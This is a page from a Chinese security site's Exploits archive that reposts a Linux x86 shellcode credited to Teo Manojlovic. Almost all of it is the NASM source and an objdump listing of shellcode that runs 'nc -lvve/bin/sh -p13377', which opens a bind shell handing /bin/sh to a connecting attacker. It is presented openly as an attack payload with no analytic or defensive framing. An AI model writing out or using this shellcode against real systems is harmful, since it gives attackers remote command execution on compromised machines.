首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
linux x86 nc -lvve/bin/sh -p13377 shellcode
来源:http://chaossecurity.wordpress.com 作者:Manojlovic 发布时间:2010-04-06  

linux x86 nc -lvve/bin/sh -p13377 shellcode
This shellcode will listen on port 13377 using netcat and give /bin/sh to connecting attacker
Author: Teo Manojlovic
Site: http://chaossecurity.wordpress.com/
Here is code written in NASM

/////////////////////////////
section .text
 global _start
_start:
xor eax,eax
xor edx,edx
push 0x37373333
push 0x3170762d
mov edx, esp
push eax
push 0x68732f6e
push 0x69622f65
push 0x76766c2d
mov ecx,esp
push eax
push 0x636e2f2f
push 0x2f2f2f2f
push 0x6e69622f
mov ebx, esp 
push eax
push edx
push ecx
push ebx 
xor edx,edx
mov  ecx,esp     
mov al,11
int 0x80
//////////////////////////////////
And here is objdump from which you can see the shellcode

//////////////////////////////////
teo@teo-desktop ~ $ objdump -d a.out

a.out:     file format elf32-i386


Disassembly of section .text:

08048060 <.text>:
 8048060: 31 c0                 xor    %eax,%eax
 8048062: 31 d2                 xor    %edx,%edx
 8048064: 68 33 33 37 37        push   $0x37373333
 8048069: 68 2d 76 70 31        push   $0x3170762d
 804806e: 89 e2                 mov    %esp,%edx
 8048070: 50                    push   %eax
 8048071: 68 6e 2f 73 68        push   $0x68732f6e
 8048076: 68 65 2f 62 69        push   $0x69622f65
 804807b: 68 2d 6c 76 76        push   $0x76766c2d
 8048080: 89 e1                 mov    %esp,%ecx
 8048082: 50                    push   %eax
 8048083: 68 2f 2f 6e 63        push   $0x636e2f2f
 8048088: 68 2f 2f 2f 2f        push   $0x2f2f2f2f
 804808d: 68 2f 62 69 6e        push   $0x6e69622f
 8048092: 89 e3                 mov    %esp,%ebx
 8048094: 50                    push   %eax
 8048095: 52                    push   %edx
 8048096: 51                    push   %ecx
 8048097: 53                    push   %ebx
 8048098: 31 d2                 xor    %edx,%edx
 804809a: 89 e1                 mov    %esp,%ecx
 804809c: b0 0b                 mov    $0xb,%al
 804809e: cd 80                 int    $0x80


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Free MP3 CD Ripper 2.6 0 day
·Zip Unzip v6 (.zip) 0day stack
·Google Chrome 4.1 OOB Array In
·Dualis 20.4 (.bin) Local Danie
·uTorrent WebUI <= v0.370 Autho
·DSEmu 0.4.10 (.nds) Local Cras
·mplayer <= 4.4.1 NULL pointer
·IncrediMail 2.0 ActiveX (Authe
·TugZip 3.5 0-day
·Microsoft Internet Explorer Ta
·Kwik Pay Payroll v4.10.3 .zip
·ZipScan 2.2c SEH
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved